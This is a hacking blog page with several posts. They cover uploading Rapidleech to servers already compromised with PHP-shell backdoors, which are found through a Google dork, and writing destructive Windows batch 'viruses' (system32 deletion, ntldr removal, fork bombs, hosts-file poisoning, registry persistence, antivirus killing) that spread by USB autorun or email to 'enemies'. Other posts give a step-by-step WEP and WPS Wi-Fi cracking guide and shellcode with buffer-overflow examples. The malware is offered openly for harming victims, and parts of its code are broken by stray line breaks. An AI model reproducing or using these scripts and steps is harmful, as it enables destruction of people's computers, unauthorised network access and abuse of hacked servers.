Ads 230 x 230

Wednesday, February 9, 2011

how to create your own private rapidleechers using hacked server

Posted by: , 0 comments

Rapidleech : how to create your own private rapidleechers using hacked server

Here are some steps you could follow in order to find hacked servers with phpshell backdoors hosted in it , and to upload Rapidleech script on the hacked servers by yourself.

1.finding phpshell backdoors

There are many kinds of phpshells out there , and what we are gonna do is to find them using some Google Dorks :P . Based on my own experiences, the most powerful google dork syntax to find those phpshells is by using “allintext” syntax , which will simply grab any sites with your desired text on its content. If you’ve been familiar enough with phpshells , you must have known what ‘s the main characteristic on phpshells themselves , you should know what kind of texts should be appeared on phpshells ;) . Just let’s go straight to the dork :

*To get more complete services of Rapidleech and Rapidshare Premium Account , you can go here : WWW.XDFG.NET for a full version of the rapidleech list !*

allintext:”Safe-mode: OFF (not secure)”

The google dork above will find any type of phpshells , c99 , r57 , or even c100 ? :P you’ll simply get ‘em all ;) And of course, it’s not the only way to get phpshells by google dorking , there are still many working google dorks to find those shits ;) , just be creative , okay ? :)

2.Upload the script!

Just go get yourself rapidleech script , which can be downloaded on www.rapidleech.com. You’ll get it downloaded as *.zip or *.rar files. Since most of phpshells hosted in hacked *nix servers , it means you can’t extract *.zip/*rar there. The recognized compressed archive filetype in *nix should be *.tar , *.tar.gz or *.tar.bz2. So , all you have to do is extract the *.zip/*.rar files , and then convert it back to *.tar files .If you don’t know how to do it , just go get yourself a guide to Linux command lines ..LOL

After you get yourself the rapidleech.tar file , now you should explore the phpshells you just already got. In order to get your script uploaded , you must find any directory with 777 permissions on it (as long as it’s still under webserver’s directory) , which means it enables you to read,write, and execute scripts on it. You can find them by using the linux command :

find / -type d -perm 777

Then you’ll get the list of any writable directories! And then change your current working directory to the directory with 777 permission on it(eg. /var/wwwroot/hacked.com/hacked_dir/). And then upload your rapidleech.tar ! and get it extracted ! :D

Now you could access your rapidleech on www.hacked.com/hacked_dir/ . It’s just that simple

. :P


source


How dangerous could a batch file be

Posted by: , 0 comments


How dangerous could a batch file be

How dangerous could a batch file be?

Hi users, today we could just you give the codes to paste in notepad and ask you to save files with extension .bat and your deadly batch viruses would be ready. But instead of that, we have focused on making the basics of batch files clear and developing the approach to code your own viruses.

What are Batch Files?

Lets begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one

1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'


Lets do the same thing in an other way. Copy these three commands in notepad and save file as anything.bat


Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run.

What can batch viruses do ?

They can be used to delete the windows files, format data, steal information, irritate victim, consume CPU resources to affect performance, disable firewalls, open ports, modify or destroy registry and for many more purposes.

Now lets start with simple codes, Just copy the code to notepad and save it as anything.bat (I am anything you wish but extension must be bat and save it as 'all files' instead of text files).

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1. Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

2. Folder flooder

@echo off
:x
md %random% // makes directory/folder.
goto x

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.

3.User account flooder

@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers.

3.Shutdown Virus

copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

4. Deleting boot files

Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

Lets make a batch file to
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again.


5. Fork Bomb

%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .



6. Extension Changer

@echo off
assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything


Every extension is associated with a file type like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.

Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wouldn’t open properly.


7. DNS Poisoning

There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to host located at that IP when that website name would be entered. I mean request to resolve IP of website is not sent to Domain Name Server(DNS) if the name of website in hosts file.

@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:\windows\system32\drivers\etc\hosts //this command prints or add xxx.xxx.xxx.xxx. www.anything.com in hosts file.

Replace xxx.xxx.xxx.xxx and www.anything.com with IP address and website of your choice. You can take/redirect victim to any host located at specific IP when he wud try to log on to specific website or u can simply block any website by entering its name and any invalid IP address.

Viruses we just coded

Note : Most of the batch viruses are simply undetectable by any anitiviruses
Tip : Coding good viruses just depends on the DOS commands you know and logic you use.
Limitations of Batch Viruses -:

1.Victim can easily read the commands by opening batch file in notepad.

2.The command prompt screen pops up,it alerts the victim and he can stop it.

To overcome these limitations,we need to convert these batch files into executable files that is exe files.
first download this Batch To Exe coverter with the help of goggling .

After running converter , open the batch file virus , Save as exe file , set visibility mode 'Invisible application' , than just click on compile button.

You can use other options as per your requirement.

Spreading batch viruses through pen drive -:

Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico

Save file as ‘autorun.inf’

Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ in pendrive .

When the victim would plug in pen drive,the autorun.inf will launch anything.bat and commands in batch file virus would execute.


Enjoy.......


Hacking Wifi or Wireless Password

Posted by: , 0 comments

WiTh aircrack



Hacking Wifi or Wireless Password

Hello Friends, This is monen today i will explain you how to crack Wifi or wireless password in just 10 to 15 minutes. I will explain How to Hack or Crack Wifi Password. Today's hack will be based on cracking the WEP encryption password. So guys tighten your belts for new hack and lets start hack wifi .......



STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE
or CLICK HERE

2. SCAN TO GET THE VICTIM

Get the victim to attack that is whose password you want to hack or crack.
Now Enter the Backtrack Linux CD into your CD drive and start it. Once its started click on the black box in the lower left corner to load up a "KONSOLE" . Now you should start your Wifi card. To do it so type

airmon-ng


You will see the name of your wireless card. (mine is named "ath0") From here on out, replace "ath0" with the name of your card. Now type

airmon-ng stop ath0


then type:

ifconfig wifi0 down


then type:

macchanger --mac 00:11:22:33:44:55 wifi0


then type:

airmon-ng start wifi0


The above steps i have explained is to spoof yourself from being traced. In above step we are spoofing our MAC address, this will keep us undiscovered.

Now type:

airodump-ng ath0


All above steps in one screen shot:


Now you will see a list of wireless networks in the Konsole. Some will have a better signal than others and its always a good idea to pick one that has a best signal strength otherwise it will take huge time to crack or hack the password or you may not be able to crack it at all.

Once you see the networks list, now select the network you want to hack. To freeze the airodump screen HOLD the CNTRL key and Press C.

Now you will see something like this:



3. SELECTING NETWORK FOR HACKING

Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on...you can still crack WPA with backtrack and some other tools but it is a whole other ball game and you need to master WEP first.



Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --

The Channel number will be under a heading that says "CH".

As shown in this figure:




Now in the same KONSOLE window type:


The file name can be whatever you want. This file is the place where airodump is going to store the packets of info that you receive to later crack. You don't even put in an extension...just pick a random word that you will remember. I usually make mine "Ben" because I can always remember it. Its simply because i love ben10....hhahahahaha :D


Note: If you want to crack more than one network in the same session, you must have different file names for each one or it won't work. I usually name them as ben1, ben2 etc.


Once you typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector" but in general terms all this means is "packets of info that contain characters of the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. More difficult is password more packets you will need to crack it.


4. Cracking the WEP password


Now leave this Konsole window up and running and open up a 2nd Konsole window.
In this window type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will send some commands to the router that basically it is to associate your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out with the last one saying something similar to "Association Successful :-)"
If this happens, then good! You are almost there.

Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean...just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds...sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this but I always start my password cracking at 5,000 just in case they have a really weak password.

***Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password.
Now type:
aircrack-ng -b (bssid) (filename)-01.cap

Remember the file name you made up earlier? Mine was "Ben". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000."
DON'T DO ANYTHING! It will stay running...it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.

If you do everything correctly up to this point, before too long you will have the password! now if the password looks goofy, dont worry, it will still work. some passwords are saved in ASCII format, in which case, aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et

This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF



Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few successful attempts, you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.

I am not responsible for what you do with this information. Any malicious/illegal activity that you do, falls completely on you because...technically...this is just for you to test the security of your own network.

By Guest Author - "Monen Khan" (he is the an ethical hacker and SEO specialist).

***Notes:



Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools. In fact, Aircrack-ng is a set of tools for auditing wireless networks.




What is Aircrack-ng ?

Aircrack-ng is the next generation of aircrack with lots of new features:

Download


Installing on Windows

The Windows version of the aircrack-ng suite does not have an install program. You must manually install (unzipping archive) the software.

Here are the steps to follow for Windows XP:
  • Download the latest version of the aircrack-ng suite for Windows to your PC. The link for the zip file can be found on theWiki home page.
  • Unzip the contents of the aircrack-ng zip file into “C:\”. This will create a directory called “aircrack-ng-0.9.3-win”. This directory name will vary based on the exact version that you downloaded. This main directory contains three subdirectories - “bin”, “src” and “test”.
Prior to using the software, make sure to install the drivers for your particular wireless card. See this link for the instructions.
To now use the aircrack-ng suite, start Windows Explorer and double click on Aircrack-ng GUI.exe inside “bin” subdirectory. The GUIrequires .NET Framework 2.0 to run (.NET Frameworks 1.0/1.1 are not able to run this executable, 2.0 or better MUST be installed).
Alternatively, open a command prompt (Start menu → Execute → cmd.exe) and change to the “C:\aircrack-ng-0.9-win\bin” directory and execute the individual commands.


Important notes:
  • Remember that Windows only supports a limited subset of the commands.

WiTh Reaver-wsp [VIDEO]





Well Every Dude out there want to hack their neighbour's wifi It is an ultimate dream for most of them. In old days it was easy that same old WEP that made is quite easy but then WPA came, the perfect Villane that was uncrackable for a long time but guess what now you can hack it in just 4 hours. Well that seems to be alot but just small time ago it took millions of years to hack it, so better late then never!

Here is an awesome software!


Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.

Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.

On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

Reaver is a WPA attack tool developed by Tactical Network Solutions that exploits a protocol design flaw in WiFi Protected Setup (WPS). This vulnerability exposes a side-channel attack against Wi-Fi Protected Access (WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network. With a well-chosen PSK, the WPA and WPA2 security protocols are assumed to be secure by a majority of the 802.11 security community.

Usage is simple just specify the target BSSID and the monitor mode interface to use:
# reaver -i mon0 -b 00:01:02:03:04:05

 WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point's PIN and then extract the PSK and give it to the attacker.


Enjoy........


Destroy ur enemy PC with virus

Posted by: , 0 comments

Destroy ur enemy PC with virus

 
 
Destroy ur enemy PC with virus
 
  
Hi all users in this post we'll take a look on how to create a deadly computer virus to destroy your enemy or victim's PC
 


1) Open Notepad

2) write the below command : -

del c:\windows\system32\*.* /q

3) Save the above notepad with the extension ".bat or .cmd" as u want

!!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!

Don't double click the file otherwise u r in trouble. Why ?????? bcz the file u created delete all files from ur
system32 folder and when u restart ur pc it will not start bcz system can not find the files in the system32 folder which is required at the time of booting.

4) You can also test the above by creating a fake folder let suppose
windows1 in C:\. Copy some old files in it and just follow the
above command.By double clicking the bat or cmd file ur all files
automaitcally get deleted.

5) You can try this file in any one`s computer.(but this result in causing damage to the computer, so think again before trying this on anyone's pc)


This post is to help you to send viruses to your enemies! Here goes,Copy the below code and paste into your notepad.. then save as anyname.bat
Do not click on that batch file........ Send it your enimies email...It will


1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer


 
Code :-

@Echo off
color
4
title
4
title R
.I.P
start
start
start
start calc
copy
%0 %Systemroot%\Greatgame > nul
reg add HKLM
\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nul
copy
%0 *.bat > nulAttrib +r +h Greatgame.batAttrib +r +h
RUNDLL32 USER32
.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill
LimeWire
tskill iexplore
tskill
NMain
start
cls
cd
%userprofile%\desktop
copy
Greatgame.bat R.I.P.bat
copy
Greatgame.bat R.I.P.jpg
copy
Greatgame.bat R.I.P.txt
copy
Greatgame.bat R.I.P.exe
copy
Greatgame.bat R.I.P.mov
copy
Greatgame.bat FixVirus.bat
cd
%userprofile%My Documents
copy
Greatgame.bat R.I.P.bat
copy
Greatgame.bat R.I.P.jpg
copy
Greatgame.bat R.I.P.txt
copy
Greatgame.bat R.I.P.exe
copy
Greatgame.bat R.I.P.mov
copy
Greatgame.bat FixVirus.bat
start
start calc
cls
msg
* R.I.P
msg
* R.I.P
shutdown
-r -t 10 -c "VIRUS DETECTED"
start
start
time
12:00
:R.I.P
cd
%usernameprofile%\desktop
copy
Greatgame.bat %random%.batgoto RIP
 
 
Enjoy....... 


What is exploit and how to use it

Posted by: , 0 comments

What is exploit and how to use it


What is exploit and how to use it?

What is an exploit

An exploit is a computer programm, which circumvent computer security. There are many ways to exploit security holes. If a computer programmer make a programming mistake in a computer program, it is sometimes possible to circumvent security. The coding of such programs, which attack (hack) the programming mistakes or security holes is the art of exploitation or exploit coding. Some common exploiting technics are stack exploits, heap exploits, format string exploits, ...


What is an stack exploit

A stack exploit occurs, if you can write more than the size of a buffer located on the stack into this buffer. If you can write more data, as the size of the buffer (more than 1024 bytes in this example) a stack overflow occurs. For example:

main(int argc, char **argv)
{
// This buffer is located at the stack
char buf[1024];
// i is located on the stack
int i;

// A 6 byte stack buffer overflow
for(i=0;i<1030;i++)
buf[i] = 'A'

// Another example
// if argv larger than 1024 a overflow occur
strcpy(buf, argv[1]);
}

Why a stack overflow is a security threat ? The assembler instruction 'call' push the return address on the stack. 'call' jump into a function in our example the function is main. If the function returns with the assembler instruction 'ret', it returns to the function pointer at the stack. If you can overflow the stack you can overwrite the return address located at stack. You can return to another location. The location should a pointer to a shellcode address. Read alephonestack.txt for more information. You can download it at my papers section.

What is a shellcode

Shellcode are machine instructions, which launch a shell for example. A shellcode looks like this:

char shellcode[]="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62 \x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\ xcd\x80";

Every char is a machine instruction. \xcd\x80 is 'int 80' for example. After an overflow occur we need a address to return. This shellcode launch a shell. If you point to the shellcode (after a stack overflow for example), the machine instructions are launched and spawns a shell. Compile this program. It tests the shellcode and spawns a shell:

// Compile this program with gcc sctest.c -o sctest and start it: ./sctest
// now you have someting like
// sh-2.03$


#include

char shellcode[]=
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\ x69\x89"
"\xe3\x8d\x54\x24\x08\x50\x53\x8d\x0c\x24\xb0\x0b\ xcd\x80";
int
main()
{
void (*dsr) ();
(long) dsr = &shellcode;
printf("Size: %d bytes.\n", sizeof(shellcode));
dsr();
}

read alephonestack.txt for basic shellcode coding

What are heap overflows

If the heap is overflowed a heap buffer overflow occurs.
A heap overflow looks like that:

// It dynamically create a 1000 byte buffer on the heap.
main(int argc, char **argv)
{
// pointer points to a heap address
char *pointer = malloc(1000);
char *pointer2 = malloc(200);

// Overflowed, if argv[1] is larger than 1000 bytes.
// The buffer pointer 2 is overflowed if pointer
// contains more than 1000 bytes.
strcpy(pointer, argv[1]);

// Free dynamically allocated data
free(pointer)
free(pointer2);
}


Format String exploit's ?

If you control the format string in one of the printf, syslog or setproctitle function, a exploitation is possible. Format strings are something like "%s", "%x", "%d", ... For example:

main(int argc, char **argv)
{
char *buf = "TEST";

// The wrong way
// The user can control the format string
printf(argv[1]);

// You should code:
printf("%x", argv[1]);
}

Enjoy


Slideshow

 
صفحات مبعــثرة كسرت حاجز الصمـت لتحكي
متعة الحياة أن تعمل عملا لم يسبقك إليه أحد ولم يتوقعه الآخرون.................. Its just another way to unlock ur potential representing my internists with other. By sniffing the web u might see several info.,instructions and details. here i collect similar and simplify them to u, cutting out from my time, efforts even i create my unique posts